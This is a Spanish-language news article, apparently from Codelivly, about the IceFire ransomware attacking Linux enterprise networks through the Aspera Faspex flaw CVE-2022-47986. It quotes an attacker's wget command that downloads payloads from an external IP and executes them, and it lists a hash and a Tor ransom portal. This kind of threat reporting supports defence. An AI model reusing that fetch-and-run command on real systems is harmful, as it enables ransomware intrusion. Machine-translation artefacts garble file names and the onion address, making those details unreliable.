IceFire Ransomware ataca redes empresariales Windows y Linux

IceFire Ransomware ataca redes empresariales Windows y Linux - Codelivly

 

Recientemente, los analistas de seguridad de SentinelOne descubrieron un infame ransomware IceFire que atacaba las redes empresariales de Windows y Linux.

Un ataque de ransomware IceFire cifra los archivos de la víctima y exige el pago a cambio de la clave para descifrarlos. Desde su descubrimiento en 2020, este malware ha sido responsable de muchos daños, tanto en las computadoras personales de los individuos como en las computadoras de las grandes organizaciones.

En las últimas semanas, los piratas informáticos han implementado el ransomware "IceFire" contra las redes empresariales de Linux, una desviación significativa de su uso anterior contra las redes de Windows. Principalmente lanza estos ataques contra redes Linux conectadas a Internet.

Índice
  1. Ransomware IceFire linux y windows
  2. Explotando la falla en IBM Aspera Faspex
  3. Los piratas informáticos apuntan a Linux
  4. Archivos y carpetas excluidos
  5. Archivos excluidos:
  6. Archivos excluidos:
  7. Nota de rescate

Ransomware IceFire linux y windows

Según el análisis, se compiló un binario de 2,18 MB con gcc para la arquitectura AMD64, que es la versión de Linux IceFire:

  • SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973

Se probó una muestra de IceFire en Ubuntu y Debian, dos distribuciones basadas en Intel; ambos sistemas de prueba ejecutaron IceFire con éxito. El sistema realizó una descarga de dos cargas útiles usando wget, y se guardaron en: -

/opt/aspera/faspex:

sh -c rm -f demostración de iFire && wget hxxp[://]159.65.217.216:8080/demostración && wget hxxp[://]159.65.217.216:8080/{servidor_víctima_redactado}/iFire && chmod +x demostración && ./demostración

Explotando la falla en IBM Aspera Faspex

El software de intercambio de archivos Aspera Faspex contiene una vulnerabilidad de deserialización identificada como CVE-2022-47986 que los operadores de IceFire explotan para obtener acceso a los sistemas vulnerables de los objetivos e instalar cargas útiles de ransomware en ellos.

Alrededor de 150 servidores Aspera Faspex están actualmente en línea, según la base de datos de Shodan, la mayoría de los cuales se encuentran en Estados Unidos y China.

Linux ha demostrado ser más difícil de implementar que Windows, especialmente cuando se trata de implementaciones a gran escala.

Para solucionar este problema, los actores tienden a explotar vulnerabilidades en las aplicaciones, como lo demostró el operador IceFire, que desplegó payloads aprovechando una vulnerabilidad en el sistema IBM Aspera.

Los piratas informáticos apuntan a Linux

Es común usar sistemas basados ​​en Linux en entornos empresariales para realizar tareas cruciales, como albergar bases de datos, servidores web y otras aplicaciones críticas para el negocio.

Por lo tanto, estos sistemas a menudo son considerados objetivos más valiosos por los actores de ransomware que las computadoras con Windows, debido a la probabilidad de un pago mayor de un ataque exitoso, en comparación con un usuario típico de Windows.

Archivos y carpetas excluidos

Como parte del ejemplo, hay una lista de extensiones de archivo a las que hacen referencia los segmentos de datos. Debido a que se refieren a ejecutables, aplicaciones o funciones del sistema, estas extensiones están excluidas del cifrado.

Archivos excluidos:

muestra .odf .odg .odi .odm .odp .ora .ost .ova .ovf .p7b .p7c .pfx .pmf .ppt .qcow .rar .tar .tib .tiff .vbox .vcb .vdi .vfd .vhd .vhdx vmc .correo .rtf .vbs .c .cpp .cs .pptx .xls .xlsx

Archivos excluidos:

  • /boot: datos utilizados al inicio
  • /dev: archivos de dispositivo, controladores
  • /etc: archivos de configuración del sistema
  • /lib: una aplicación o sistema utiliza una biblioteca compartida para vincular dinámicamente la funcionalidad
  • /proc: Linux ofrece un sistema de archivos virtual para almacenar información de tiempo de ejecución sobre el sistema, como PID, unidades montadas, configuraciones del sistema, etc.
  • /srv: directorios del servidor web
  • /sys: Interfaz al núcleo; similar a /proc
  • /usr: binarios a nivel de usuario y datos estáticos
  • /var: datos dinámicos, por ejemplo, cachés, bases de datos
  • /run: información del sistema, incluidos los archivos PID; borrado en cada reinicio

Nota de rescate

IceFire incrusta la nota de rescate en un recurso binario que se suelta y se escribe en cada directorio de destino para el cifrado de archivos.

Se incluyen un nombre de usuario y una contraseña codificados en la nota de rescate para que pueda iniciar sesión en el portal de pago de rescate alojado en un servicio oculto de Tor en:-

  • 7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd[.]cebolla

Está claro a partir de este desarrollo para IceFire que el ransomware dirigido a Linux seguirá creciendo en popularidad a lo largo de 2023, independientemente de su duración.

La implementación de ransomware en Linux es mucho más difícil que en Windows, especialmente si desea hacerlo a gran escala.

El equipo de ciberseguridad de SentinelOne hizo todo lo posible para proporcionar todos los detalles esenciales del ataque de ransomware.

Si quieres conocer otros artículos parecidos a IceFire Ransomware ataca redes empresariales Windows y Linux puedes visitar la categoría Tutoriales.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Subir

Esta página web utiliza cookies para analizar de forma anónima y estadística el uso que haces de la web, mejorar los contenidos y tu experiencia de navegación. Para más información accede a la Política de Cookies . Ver mas